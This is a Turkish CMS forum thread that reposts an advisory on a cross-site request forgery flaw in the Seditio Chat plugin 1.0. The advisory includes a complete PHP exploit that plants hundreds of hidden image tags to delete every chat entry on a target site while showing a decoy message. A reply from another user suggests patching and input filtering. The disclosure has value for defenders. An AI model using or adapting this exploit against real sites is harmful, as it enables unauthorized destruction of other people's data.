Total Users Online: 6 üye, 5 guest | Tarih/Saat: 2013-05-24 10:36
 
Seditio Chat 1.0 Cross Site Request Forgery
2012-04-12 19:27 GMT  Çoklu Alıntı
Kaan

User is: Online status   Gender_M
Posts: 2773
Ülke: İstanbul - 34
Meslek: Serbest Meslek
Age: 30

Seditio Chat plugin version 1.0 suffers from a cross site request forgery vulnerability

Kod:
=========================================================
Vulnerable Software: Seditio Chat Plugin (Chat İndex Plugin) v 1.0
http://www.seditio-eklenti.com/page.php?id=418
http://www.seditio-eklenti.com/chat-plugin-index-d418.html
Downloaded: http://www.seditio-eklenti.com/datas/users/1-chat.rar
(MD5 SUM: d1565b438199984661cf2147572724a6 *1-chat.rar)
=========================================================
Tested:
With Seditio v165
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
    -> ;
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+
*/
=========================================================
About Software:
Seditio Chat Plugin (Chat İndex Plugin) v 1.0 is popular plugin for Seditio CMS.
It gives ability to users~administrators~moderators to chatting.
=========================================================
Vuln Desc:
This plugin is prone to CROSS SITE REQUEST FORGERY vulnerability.
It uses $_GET without any proper check of request validity when deleting entries from chat.
It can be used by malicious people for delete chat entries.
================ Seditio chat plugin Delete chat entries CSRF exploit =================
<?php
/*
4 Fun
Seditio chat plugin Delete chat entries CSRF exploit (Sounds peacifull xD)
*/
$target='http://192.168.0.15/learn/128/sed/seditio165/'; // target site
$howmuch=500;// how much entries to "rm" in chat? :)


/* Do not change */

$body=str_repeat(PHP_EOL,300);
$howmuch=(int)$howmuch;
$sithere=strrev('OoPs! Can not Load Page.WTH? What about Refresh ?');// 4 think about :D.While we deleting chat entries:D
for($i=0;$i<=$howmuch;$i++)
{
$body.='<img src="'. $target .  '/plug.php?e=chat&c=delete&id=' . $i . '" width="0" height="0" /><br>' .PHP_EOL;
}
die($body . '<h1>' . $sithere . '</h1>');
/* EOF */
?>
==============================EOF================================
Konuyla İlgili Diğer Başlıklar
Yeni Seditio bazli sitem
Seditio 171 Beta İndir.
Yeni Site Aktif Edildi. www.seditiocms.com
Plugins Editör New Seditio 171
Seditio 171 Geliştirmesi.
Emlak, Oto Galeri, Rent A Car, Şiir, Edebiyat Script Siparişlerinizi Verebilirsiniz.
Detaylar İçin: kaan@ntka.org

Seditio 170 İndir
Yabancı Müzik İndir
Seditio Toolbar İndir

 

Seditio Chat 1.0 Cross Site Request Forgery
2012-04-13 02:45 GMT  Çoklu Alıntı
rootinq

User is: Online status   Gender_M
Posts: 68
Ülke: --- - 00
Meslek: İktisat
Age: 26

benim paylastıgım yamayı kullanın bunlar etkili buglar degil fakat pm pluginindeki ciddi bir açığa benziyor çözüm basit aslında url üzerinden calısacak tüm kodları filtrelemek.

Kod:
http://www.furkandindar.com.tr/2012/04/yeni-seditio-sql-injection-acg-bug.html

 

Powered by Seditio © 2009-2012 All Rights Reserved